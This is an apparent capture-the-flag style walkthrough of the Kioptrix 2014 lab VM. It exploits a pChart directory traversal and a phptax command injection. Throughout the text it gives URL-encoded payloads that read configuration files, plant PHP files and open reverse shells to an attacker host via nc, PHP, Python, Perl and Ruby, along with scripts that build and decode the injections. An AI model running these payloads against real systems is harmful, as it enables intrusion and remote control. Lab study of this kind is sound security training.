Kioptrix 2014 Notes - Full walkthrough to be updated
Notes:
httpd.conf file
http://192.168.0.15/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf
httpd Error Log
http://192.168.0.15/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2f/var/log/httpd-error.log
Executing system commands
The pfilez parameter is passed to a shell, so a ';' ends the file name and whatever follows runs as a command. For example, writing the output of id to out.txt:
http://192.168.0.15:8080/phptax/index.php?pfilez=1040pg1.tob;id > out.txt&pdf=make
File creation tests
Create a file that shows the phpinfo of the system in the virtual directory /files/
This directory is writable by the web user www
http://192.168.0.15:8080/phptax/index.php?pfilez=1040d1-pg2.tob;echo%20%22%3C?php%20phpinfo()%20?%3E%22%20%3E%20./files/zzz.php;&pdf=make
This is now listable at the URL
http://192.168.0.15:8080/phptax/files/
We can prove we can write HTML too by creating a very simple test file and requesting it to see the outcome:
http://192.168.0.15:8080/phptax/index.php?pfilez=1040d1-pg2.tob;echo%20%22%3Ch1%3Etest123%3C/h1%3E%22%20%3E%20test123.html;&pdf=make
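The file-creation requests above are all the same trick: a shell command hidden after a ';' in the pfilez parameter, with the shell metacharacters percent-encoded by hand. The script below is an added example, not code from this write-up: it decodes the page's own URLs back into the command they run, builds correctly encoded ones, and flags such requests in an Apache access log. It also shows why a raw '&' inside the injected command (as in the php and ruby one-liners further down) truncates it: PHP splits the query string on '&' before percent-decoding. The target URL and the two decoded requests are the page's own; the access-log lines are constructed sample input.

```python
"""Added example (not from the Kioptrix 2014 write-up): decode phptax
command-injection URLs, build correctly encoded ones, and flag them in an
Apache access log. URLs are the page's own; log lines are constructed."""
import re
from urllib.parse import quote, unquote, urlsplit

TARGET = "http://192.168.0.15:8080/phptax/index.php"   # the page's target

# Shell metacharacters that have no place in a .tob file name.
SHELL_META = re.compile(r"[;|`]|\$\(")

# Apache combined log: client IP first, request line in quotes.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')

# Three URLs from the page: the phpinfo drop, the get.txt/nc fetch, and the
# php -r one-liner from the "didn't work" list (note its raw '&' characters).
PHPINFO_URL = (TARGET + "?pfilez=1040d1-pg2.tob;echo%20%22%3C?php%20phpinfo()"
               "%20?%3E%22%20%3E%20./files/zzz.php;&pdf=make")
FETCH_URL = (TARGET + "?pfilez=1040pg1.tob;%20nc%20192.168.0.100%2080%20%3C"
             "%20get.txt%20%3E%20r.php;%20&pdf=make")
PHP_URL = (TARGET + "?pfilez=1040d1-pg2.tob;php%20-r%20%27$sock=fsockopen("
           "%22192.168.0.100%22,443);exec(%22/bin/sh%20-i%20%3C&6%20%3E&6"
           "%202%3E&6%22);%27;&pdf=make")

# Constructed access-log lines: a normal phptax request, the phpinfo
# injection, and the listing of /files/.
SAMPLE_LOG = [
    '192.168.0.100 - - [01/Jan/2015:22:41:03 +0000] "GET /phptax/index.php'
    '?pfilez=1040d1-pg2.tob&pdf=make HTTP/1.1" 200 5120',
    '192.168.0.100 - - [01/Jan/2015:22:41:09 +0000] "GET /phptax/index.php'
    '?pfilez=1040d1-pg2.tob;echo%20%22%3C?php%20phpinfo()%20?%3E%22%20%3E'
    '%20./files/zzz.php;&pdf=make HTTP/1.1" 200 5120',
    '192.168.0.100 - - [01/Jan/2015:22:42:30 +0000] "GET /phptax/files/'
    ' HTTP/1.1" 200 743',
]


def pfilez_value(url):
    """URL-decoded pfilez parameter, split the way PHP's $_GET does it:
    on '&' first, percent-decoding afterwards. A raw '&' inside the
    injected command therefore cuts the command short."""
    for pair in urlsplit(url).query.split("&"):
        if pair.startswith("pfilez="):
            return unquote(pair[len("pfilez="):])
    return None


def injected_command(url):
    """The command smuggled after the first ';' of pfilez, or None when the
    value looks like a plain file name."""
    value = pfilez_value(url)
    if value is None or not SHELL_META.search(value):
        return None
    _, sep, tail = value.partition(";")
    return (tail if sep else value).strip().rstrip(";").strip()


def inject(cmd, tob="1040d1-pg2.tob"):
    """Build the injection URL, percent-encoding everything (safe='') so
    '&', '<', '>' and spaces in cmd survive the trip through the query."""
    return "%s?pfilez=%s&pdf=make" % (TARGET, quote("%s;%s;" % (tob, cmd), safe=""))


def scan_access_log(lines):
    """(client, decoded command) for every request whose pfilez carries one."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        cmd = injected_command(m.group(2))
        if cmd is not None:
            hits.append((m.group(1), cmd))
    return hits


if __name__ == "__main__":
    for url in (PHPINFO_URL, FETCH_URL, PHP_URL):
        print("runs:", injected_command(url))
    print("encoded:", inject("id > ./files/out.txt"))
    for client, cmd in scan_access_log(SAMPLE_LOG):
        print("flagged %s: %s" % (client, cmd))
```

Decoding PHP_URL shows the command ending at "/bin/sh -i <": everything from the first unencoded '&' onward became separate query parameters, so the shell never saw the redirections. inject() encodes '&' as %26 to avoid that.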
Trying to create a backdoor.
Working method..
First we edit Pentest Monkey's php-reverse-shell with the attacker's IP and the port our listener will use (4444 in the listener output below; this could be changed to another port, e.g. 443, depending on needs and any firewall).
Next we create a file called get.txt containing the raw HTTP request we want to send later.
The request in get.txt will download our reverse shell file (saved on the attacker's web server as r.txt).
http://192.168.0.15:8080/phptax/index.php?pfilez=1040d1-pg2.tob;printf%20%22GET%20http://192.168.0.100/r.txt%20HTTP/1.0\r\n\r\n%22%20%3E%20get.txt;&pdf=make
Now we copy the reverse shell, renamed r.txt, to our Apache web service. (When doing this originally with Python's SimpleHTTPServer it didn't work for some unknown reason.)
Make sure the file is in the web root, like so: "/var/www/html/r.txt"
Now we use nc on the target to send the request in get.txt to the attacker's web server on port 80 and save the response as r.php. Note that nc writes the whole response, HTTP headers included, into r.php; PHP prints that leading header text as plain output and then executes the <?php block that follows it.
http://192.168.0.15:8080/phptax/index.php?pfilez=1040pg1.tob;%20nc%20192.168.0.100%2080%20%3C%20get.txt%20%3E%20r.php;%20&pdf=make
Next we set up our nc listener
nc -l -v -p 4444
Now we request the php file to trigger it
http://192.168.0.15:8080/phptax/r.php
And voilà, a shell :-)
listening on [any] 4444 ...
192.168.0.15: inverse host lookup failed: Unknown host
connect to [192.168.0.100] from (UNKNOWN) [192.168.0.15] 60832
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
10:47PM up 6:15, 0 users, load averages: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE WHAT
uid=80(www) gid=80(www) groups=80(www)
sh: can't access tty; job control turned off
$
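The get.txt / nc steps above move the reverse shell as one raw HTTP exchange, so it is worth seeing exactly what goes over the wire. The script below is an added example, not code from this write-up: it reproduces what printf wrote into get.txt, what "nc host 80 < get.txt > r.php" saves (the response headers land in r.php ahead of the PHP code), and the difference between the absolute-form request line in get.txt, which Apache serves, and Python's http.server, which maps "GET http://host/r.txt" onto a non-existent local path and answers 404. The attacker IP and file names are the page's own; the sample response and the local http.server used in demo() are constructed stand-ins for the attacker's web server.

```python
"""Added example (not from the Kioptrix 2014 write-up): the get.txt / nc
download step done with Python sockets. Sample response and local server
are constructed; IP and file names are the page's."""
import os
import shutil
import socket
import tempfile
import threading
from functools import partial
from http.server import HTTPServer, SimpleHTTPRequestHandler

# Constructed sample of what Apache sends back for get.txt's request: the
# headers nc also writes into r.php, then an abridged stand-in for
# pentestmonkey's php-reverse-shell as the body (43 bytes).
SAMPLE_RAW = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Apache\r\n"
    b"Content-Type: text/plain\r\n"
    b"Content-Length: 43\r\n"
    b"Connection: close\r\n"
    b"\r\n"
    b"<?php\n$ip = '192.168.0.100';\n$port = 4444;\n"
)


def build_get_txt(url):
    """Bytes that printf "GET <url> HTTP/1.0\\r\\n\\r\\n" wrote into get.txt:
    an absolute-form request line, HTTP/1.0, no Host header."""
    return ("GET %s HTTP/1.0\r\n\r\n" % url).encode()


def split_response(raw):
    """Split the raw bytes nc saved into (status line, headers, body).
    r.php on the target is all of 'raw': PHP echoes the header text as
    literal output and only then runs the '<?php' block."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def fetch_raw(host, port, request):
    """What 'nc host port < get.txt > r.php' does: send the request bytes,
    read until the server closes, return everything it sent."""
    chunks = []
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(request)
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


class QuietHandler(SimpleHTTPRequestHandler):
    def log_message(self, *args):   # keep the demo output clean
        pass


def serve_directory(directory):
    """Constructed stand-in for the attacker's web server: Python's
    http.server on 127.0.0.1, random port. Returns (server, port)."""
    server = HTTPServer(("127.0.0.1", 0), partial(QuietHandler, directory=directory))
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def demo():
    """Serve r.txt locally and fetch it with the absolute-form request line
    from get.txt and with an origin-form one. Returns
    (absolute-form status line, origin-form status line, origin-form body)."""
    tmp = tempfile.mkdtemp()
    with open(os.path.join(tmp, "r.txt"), "wb") as f:
        f.write(b"<?php /* stand-in for php-reverse-shell */ ?>\n")
    server, port = serve_directory(tmp)
    try:
        base = "http://127.0.0.1:%d" % port
        abs_status, _, _ = split_response(
            fetch_raw("127.0.0.1", port, build_get_txt(base + "/r.txt")))
        org_status, _, body = split_response(
            fetch_raw("127.0.0.1", port, build_get_txt("/r.txt")))
    finally:
        server.shutdown()
        server.server_close()
        shutil.rmtree(tmp, ignore_errors=True)
    return abs_status, org_status, body


if __name__ == "__main__":
    print("get.txt:", build_get_txt("http://192.168.0.100/r.txt"))
    status, headers, body = split_response(SAMPLE_RAW)
    print("r.php starts with:", SAMPLE_RAW[:15], "| body starts:", body[:5])
    abs_status, org_status, body = demo()
    print("absolute-form via http.server:", abs_status)
    print("origin-form via http.server:", org_status, body)
```

Against Apache the absolute-form line is fine, so r.php ends up as "HTTP/1.1 200 OK ..." followed by the reverse shell, and the shell still fires when the file is requested.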
Things that didn't work..
Using PHP
http://192.168.0.15:8080/phptax/index.php?pfilez=1040d1-pg2.tob;php%20-r%20%27$sock=fsockopen(%22192.168.0.100%22,443);exec(%22/bin/sh%20-i%20%3C&6%20%3E&6%202%3E&6%22);%27;&pdf=make
Using NC - here we get a connection that disconnects straight away
http://192.168.0.15:8080/phptax/index.php?pfilez=1040d1-pg2.tob;/bin/sh%20|%20nc%20192.168.0.100%20443;&pdf=make
Output:
#:~ sudo nc -l -p 443 -vvv
listening on [any] 443 ...
192.168.0.15: inverse host lookup failed: Unknown host
connect to [192.168.0.100] from (UNKNOWN) [192.168.0.15] 62073
sent 1, rcvd 0
Tried on ports 4444, 2345 and 5050 to no avail..
Maybe the firewall is blocking our connection..
Using NC another way (nc listening on the target instead, port 1234)
http://192.168.0.15:8080/phptax/index.php?pfilez=1040d1-pg2.tob;/bin/sh%20|%20nc%20-l%201234;&pdf=make
Using Python
http://192.168.0.15:8080/phptax/index.php?pfilez=1040d1-pg2.tob;/usr/local/bin/python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.0.100%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27;&pdf=make
http://192.168.0.15:8080/phptax/index.php?pfilez=1040d1-pg2.tob;/usr/local/bin/python2.7%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.0.100%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27;&pdf=make
http://192.168.0.15:8080/phptax/index.php?pfilez=1040d1-pg2.tob;/usr/local/include/python2.7%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.0.100%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27;&pdf=make
(/usr/local/include/python2.7 is the C header directory, not an interpreter; the locate output below shows the binaries live under /usr/local/bin.)
Let's check where Python is located and send the output to a file in the listable '/files/' directory....
Using 'locate' like so...
http://192.168.0.15:8080/phptax/index.php?pfilez=1040pg1.tob;locate%20python%20%3E%20./files/out.txt&pdf=make
Now we open ./files/out.txt from that listing and get:
## Output ##
/usr/local/bin/python
/usr/local/bin/python2.7
Using Perl
http://192.168.0.15:8080/phptax/index.php?pfilez=1040d1-pg2.tob;/usr/bin/perl%20-e%20%27use%20Socket;$i=%22192.168.0.100%22;$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(%22tcp%22));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,%22%3E&S%22);open(STDOUT,%22%3E&S%22);open(STDERR,%22%3E&S%22);exec(%22/bin/sh%20-i%22);};%27;&pdf=make
Using Ruby
http://192.168.0.15:8080/phptax/index.php?pfilez=1040d1-pg2.tob;/usr/bin/ruby%20-rsocket%20-e%27f=TCPSocket.open(%22192.168.0.100%22,4444).to_i;exec%20sprintf(%22/bin/sh%20-i%20%3C&%d%20%3E&%d%202%3E&%d%22,f,f,f)%27;&pdf=make
Xterm
http://192.168.0.15:8080/phptax/index.php?pfilez=1040d1-pg2.tob;xterm%20-display%20192.168.0.100:4444;&pdf=make